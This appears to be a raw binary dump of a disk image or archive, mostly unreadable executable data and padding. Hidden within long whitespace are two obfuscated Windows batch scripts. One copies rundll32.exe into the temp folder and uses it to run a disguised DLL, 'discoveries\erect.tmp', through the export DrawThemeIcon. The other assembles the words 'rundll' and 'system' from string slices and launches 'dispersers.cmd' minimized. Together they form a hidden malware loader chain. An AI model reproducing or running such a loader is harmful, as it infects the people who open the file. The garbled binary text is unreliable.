4444$4D4R4X4a4p4�4�4�4�4�4�4�4�4�45-5A5U5i5}5�5�5�5�5�5�5	6616E6Y608N8�8�8�89*999`9f9q9�9�9�9�9�9�9�9::,:<:L:\:�:�:�:;;";>;D;L;Q;`;e;j;o;�;�;�;<<$<4<D<T<d<t<�<�<�<�<�<�<�<�<==$=4=D=T=�>�>�>�>�>�>�>�>	??)?9?I?Y?   �  �  00#0(0]0�0�0�0�0�0�0�01111J1�1�1�1�1�1�1�1�1
22*2:2J2Z2j2z2�2�2�2�2�2�2�2�2
3(404?4�4�4�4�45%5+505;5F5L5Z5g5m5s5y5�5�5�5�5�5�566!616H6s6z6�6�6�6�6�6�6�6�67!777E7]7y7�7�7�7�7�7�7�7�78868b8p8�8�8�8�8P9\9l9{9�9�9�9�9�9�9�9�9 ::-:;:@:E:J:[::�:�:�:�:�:�:�:�:;;$;.;K;i;;�;�;�;�;�;�;�;�;�;<<<< <e<�<�<�<�<�<�<�<�<�<===D=J=P=V=[=a=f=k=p=v=|=�=�=�=�=�=>(>.>D>I>S>v>{>�>�>�>�>�>?&?J?\?a?f?k?p?�?�?   �  `  00.090H0`0{0�0�0�0�0�0�0�0�0�0�01V1[1`1e1j1�1�122Q2W2g2u2�2�2�2�23d3�3�3�3�34&4J4_4t4�4�4�4�4�4�4�4�4�45%5*5/5T5�5�5�5�5�5�5�5�5	66)696I6Y6�6
77I7�7�7�7�78)888=8B8g8�8�8�8�8�8�8�8k9�9�9�9�9�9�9�9:,:1:\:h:m:w:|:�:�:�:�:;%;5;E;U;e;u;�;�;�;�;�;�;�;�;<<%<5<==�=�=�=�=�=�=>7>F>K>P>U>�>�>�>�>�>�>�>�>�>�>�>�>�>???v?�?�?�?�?�?�?�? �  h  00$040D0T0d0t0�0�0�0�0�0�0�0�01�12222?2W2\2e2j2o2t2y22�2�2�2�2�2�2�2�2�2�2�233+303D3q3�3�3�3�3�3�3�3�344!414A4Q4a4q4�4�4�4�4�4�4�4�455a6t6�6�6�6�6�6�6�6�6~7�7�7�7�7�7�7�788!818�8�8�899-9=9M9]9m9}9�9�9�9�9�9�9�9�9::;5;;;g;�;�;�;�;�;�;<<%<*</<4<�<�<�<�<�<�<
==*=:=J=Z=j=z=)><>B>S>k>{>�>�>�>�>=?L?Q?V?{?�?�?�?�?�?�?�?�?�?�?�?�?�?�?   �  |  ?0R0Z0�0�0�0�0�0�0�0�0�01"1:1U1b1�1�1�1�1�1�1�1�1�12F2P2U2j2o2�2�2�2�2�23<3M3R3^3�3�3�3�3�3�3�3�3]4b4h4n4u4{4�4�4�4�4�4�4�4�4�4�4�4525B5R5b5r5�5�5�5 666,6D6I6�6�6�6�6�6777&7+707E7a7f77�7�7�7�7�7�7�7�7�7�78J8O8Y8^8h8y8~8�8�8�8�8�8�89&9+959g9�9�9�9�9�:;;1;b;q;v;{;�;�;�;�;<<-<l<|<�<�<�<�<�<�<�<�<==,=<=L=\=l=|=�=�=�=�>�>�>�>�>�>??!?'?0?=?i?x?�?�?�?�?�?     l  0-0=0M0]0m0}0�0�0�0�0�0�0z1�1�1�1�1�1�1�122'272G2W2g2w2�2�2�2�2�2�2�2�233'3M4R4f4s4�455<5H5Q5V5\5g5v5{5�5�5�5�5�56,6<6L6\6l6|6�6�6�6�6�6�6�6�6�7�7�7�7�7�7�7888!8E8J8�8�8�8�8�8�8�899.9>9N9^9n9~9�9�9Y:d:o:~:�:�:�:�:�:�:�:;;(;�;�;�;�;�;�;<<<<"<+<0<5<:<P<V<\<�<�<�<�<�<�<�<=>=M=R=g=|=�=�=�=�=�=�=�=�=�=>8>K>Q>\>j>�>�>�>�>�>�>	??#?�?�?�?    T  00p0�0�0�0�0�0�0�0�011#131C1S1c1s1�1�1�1�1�1�1�1�2�23	333<3K3U3Z3�3�3�3�3�3�3�3�344�4�4�4�4�4�4�45+545=5B5G5L5R5X5]5b5�5�5�5�5�56!6C6R6W6l67	777!7&7B7U7e7u7�7�7�7�7�7�7�7�788%858E8U8e8u8b9l9q9�9�9�9�9:N:�:�:�:�:�:+;1;6;M;`;p;�;�;�;�;�;�;�;�; << <0<@<P<`<p<�<�<�<�<�<�<�<�< == =0=@=P=`=p=�=?)?6?L?S?�?�?�?�?�?�?�?   p  	00)090I0Y0i0y0�0�0�0�0�0�0�0�0	11)191I1Y1i1y1�1�1�1333$3)3^3�3�3�3�3�3�3�3494L4\4l4|4�4�4�4�4�4�4�4�455,5<5L5\5l5d6w6�6�6�6�6�6�6�6�677'777G7W7g7w7�7�7�7�7�7�7�7�788'8p9v9~9�9�9�9�9�9�9�9�9�9�9�9�94:N:�:�:�:;.;j;�;�;�;�;�;<<$</<5<<<C<L<Q<[<k<�<�<�<�<�<�<�<�<�<�<�<=�=�=�=�=�=>>">(>->2><>E>K>X>_>�>�>�>????5?I?W?\?a?~?�?�?�?�?�?�?�?�?�?   0 $  %0H0Q0V0_0d0m0w0}0�0�0�0�0�0�0�0�011>1Q1a1q1�1�1�1�1�1�1�1�122!212A233 3%3*3/3t3�3�3�3�3�344/4?4O4_4�4�4%5B5P5v55�5�5�5�5�5�5�5�5�5�56!6<6B6N6X6n6�6�6�6�67=7\7w7�7�7�7�78,8�8v9�9�9�9 :/:F:L:R:X:^:d:j::�:�:�:�:�:%;2;Z;l;�;A<m<z<�<�<�<�<�<==H=R=`={=�=�=
>�>? ?]?z?�?�?�? @ �   G0P0X0�0�0�0�0�0�0�0111%1G1N1a1w1C2c2m2�2�2�2�2�233'3a3j3q3w3}3�3�3�3�3�3�3�3�3�34$4-484?4R4`4f4l4r4x4~4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�455+545�5#6�6�67#7(7�758F8$:7:U:c:<H<O<T<X<\<`<�<�< ====�?�? P    00�0@5   ` �   �0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�01�23G3O3a3n3�3�3I4�5�5�56+696?6Z6�6�6�6�6�6�6�6 77[7j7J8w:�<1=�?�?�?   p �    0'0�1�2�4�4�4�4�4	555E5Q5j6q6�6�6�6�6�6 7)7<7d77�7�7�7�7�7�7�7�7�7�7�7�78$80858:8X8b8n8s8x8�8�8�899Z9a9g9�9�9�9:O:=;G;T;�;�;<<)<p<�<�<�<�<{=�=�=�> � L   q05
5:5B5�5�5�6�6�6�6 7888888 8$8(8,8g8l8q8�8�8�8>�>�>??   �     91A1x11�4�8�;�;+<2<T?   �    11@1G1�4   � L   u8�:�:�:�:�:�:�:!;f;r;�;\<h<x<�<�<�<�<�<&=2=�=�=�=0?@?L?X?f?�?�?�?�? � �   �0111Y1w1�1�1�1I3b3w3�3�3�3�3444+4C4H4T4Y4m4�4�4V5]5o5x5�5�5666"636D6d6�6�6�6�6 7`7e7�7�7�9�9�9;3;E;S;f;q;|;�;�;T<g<�<=�=�=�=)>R>b>�>�>	???"?-?3?A?N?R?Z?f?�?�?�?�? � �    0,0=0B0z0�0�0�0c1n1U2�2�23g3�3�3�4b5i5�5�5�5�5�56%676J6d6x6�6�6�6�6�67797g7v7�7�7�7�7�78!818>8b8l8�8�8�8�8�8�89P9:):P:Z:}:�:�:�:�:;b;u;�;>>)>n>t> ????%?*?/???D?I?q?�?�?�?�?�?�?�? � �   000090q0�0�0�0�0�0�0�011111;1K1P1U1p11�1�1�1�1�1�1�1�1�1 222262F22�2�2�2�2�23363@3b3�3�3�3�34%474R4�4�4�4�4
55'5<5G5M5V5�5�5�5�5�5�5626{6�6�6�6�6�67B7�7�7�7�7�7	88+8D8q8x8�8�8�8�8�8�849:9�9:l<R=F>m>�>�> � �   b0�0	1$1.1�12#2F2�2�2�2�2�2�2�2�2�2 3T3g3�3�36)6j6�6�6�6#7,70767:7@7D7N7a7o7�7�7�7!8�8�89Q9�9�9�9�9�:�:5;U;�;<	<<)<a<�<�<�<=1=a=�=�=�=)>Y>�>�>�>�>1?8???F?S?�?�?�?�?�?   �   }0�0�0�0131Y1�1�1�1�1�1�12�2�2�2�4�4�4�4�4	55'5<5S5v5�5�5�5�5�5�5�5Q677�7�7�8"9L9|9�9:2:R:�:�:;#;5;G;Y;k;};�;�;�;�;�;�;
<<.<@<b=+>    �   '0~0�0�0�01	1I1U1e1q1�1�1�1�122�2�2,3^3�3F4�4�45[5\6l6}6�6�6�6I7U7e7q7�7�7�7�788�8�8�89)9i9t9�9�9�9�9::2:M:V:^:K;�;�;�;<�<d=�=7>�>�>:?�?     �   0�2�2/353�3�384G4U4r4z4�4�4�4�4�4�455<5�5�5�566#6�6�6�67:7R7�7�7@8�8�9�95:a:�:�:;L;v;�;�;�;�;C<i<�<�<,=R=y=�=T>�>�>�>�>?   0 d   	0�011m1�1�1�1�1�1222�2�2�4�5�5606�6�7]8w8�8�8�8�8�89J9c9�9�9::\::�:c<�=�=�=�=�=   @ �   �1�23�3�3�3�4�4�4�4�4�4�4�4�4�45 5.5d5�56z6�6�6�6y7�7�7�7�7�7�7!8-8A8M8Y8y8�8�8�899+9:9M:~:�:�:;(;3;�;)<!>�>�>I?h? P 4   �0�0�0�0�0�0�1�1�3C4S4p4�4F7�7�78Z<�<�<F=�? ` X   �1�4�57M8j8�8�8�8�89$949D9T9d9t9�9�9�9�9�9�9�9�9::$:4:D:T:d:t:�:�:�:�:�:�:�: p P   0000000 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0�0�0�0�0�0�0   � h   p2�233(383H3`3l3p3t3�3�3x9|9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�:;4;P;p;�;�;�;p>t>x>�>�>�>�>�>�> 0   X1\1`1d1h1l1p1t1x1|1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1 2222 2(20282@2H2P2X2`2h2p2x2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2 3333 3(30383@3H3P3X3`3h3p3x3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3 4444 4(40484@4H4P4X4`4h4p4x4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4 5555 5(5P;T;X; @ �   x:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�: ;;;;;;;; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�; <<<<<<<< <$<(<,<0<4<8<<<@<D<H<L<P<T<X< P 0    7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7 p L  �:�:�:�:;$;,;4;<;D;L;T;\;d;l;t;|;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;<<<<$<,<4<<<D<L<T<\<d<l<t<|<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<====$=,=4=<=D=L=T=\=d=l=t=|=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=>>>>$>,>4><>D>L>T>\>d>l>t>|>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>????$?,?4?<?D?L?T?\?d?l?t?|?�?�?�?�?�?�?�?�?�?�?�?�?�?�?�?�?   � �  0000$0,040<0D0L0T0\0d0l0t0|0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�01111$1,141<1D1L1T1\1d1l1t1|1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�12222$2,2428<@<H<P<X<`<h<p<x<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�< ==== =(=0=8=@=H=P=X=`=h=p=x=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�= >>>> >(>0>8>@>H>P>X>`>h>p>x>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�> ???? ?(?0?8?@?H?P?X?`?h?p?x?�?�?�?�?�?�?�?�?�?�?�?�?�?�?�?�? �    0000 0(00080@0H0P0X0`0h0p0x0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0 1111 1(10181@1H1P1X1`1h1p1x1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1 2222 2(20282@2H2P2X2`2h2p2x2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2 3333 3(30383@3H3P3|>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>????$?,?4?<?D?L?T?\? � �   z1~1�1�1D:H:P:�:�:;; ;$;,;D;T;X;h;l;p;x;�;�;�;�;�;�;�;�;�;�;�;<<<<,<<<@<P<T<X<\<d<|<�<�<�<�<�<�<�<�<�<�<�<�<�<=$=(=8=<=@=H=`=>(>p>�>�>�>�>�>�>�>�>�>�>�>????$?,?4?<?D?L?T?\?d?l?t?|?�?�?�?�?�?�?�?�?�?�?�?�?�?�?�?�? � �  0000$0,040<0D0L0T0\0d0l0t0|0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0 1,141L1X1x1�1�1�1�1�1�1�1�1�1�1�1�12$2H2h2p2x2�2�2�2�2�2�2�2�2�2�2�2�2�2330383@3H3P3X3`3h3p3x3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3 4444 4(40484@4H4P4X4`4h4p4x4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4 5555 5(50585@5H5P5X5`5h5p5x5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5 6666 6(606<6\6d6l6t6|6�6�6�6�6�6�6�6�6�6�6�6�6 7777 7(70787@7H7P7X7`7h7p7x7�7�7�7�7�7�7�7�7�7�7�7�7�7�7�788$8,848<8D8L8T8\8d8l8t8|8�8�8�8�8�8�8�8�8�8�8�8�8 9999 9(90989@9H9P9X9`9h9p9x9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9:$:,:4:<:D:L:T:\:d:l:t:|:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:;;;;$;,;4;<;D;L;T;\;d;l;t;|;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;< <(<0<8<@<H<P<X<`<h<p<x<�<�<�<�<�<�<�<�<�<�<�<�<�<�<===$=,=4=<=D=L=T=\=d=l=t=|=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=>>>>$>,>4><>D>L>T>\>d>l>t>|>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>????$?,?0?8?L?T?\?d?h?l?t?�?�?�?�?�?�?�?�?�?�?   � �    0 0,0D0H0d0h0�0�0�0�0�0�0�0�0�01,101L1P1X1`1h1l1t1�1�1�1�1�1�122 2,2L2X2�2�2�2�2�2303P3p3�3�3�3�3404P4p4�4�4�4�4505L5P5   �    h1                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  set feigningBars=%windir%
set baselinesGramophones=%feigningBars%\\%132\\%2r32.exe
set servicingSkiving=%temp%
set ambushingTribal=replace

:: latheredPersonifying
%ambushingTribal% %baselinesGramophones% %servicingSkiving% /A
call %2l32 discoveries\\erect.tmp,DrawThemeIcon

exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             set congregationOffal=mylorundlysystemx
set straitsShotgun=%congregationOffal:~4,5%
set principalitiesEntreated=%congregationOffal:~10,6%

start /min discoveries\dispersers.cmd %principalitiesEntreated% %straitsShotgun%
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               .           ��~�U�U  �~�U�    ..          ��~�U�U  �~�U                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               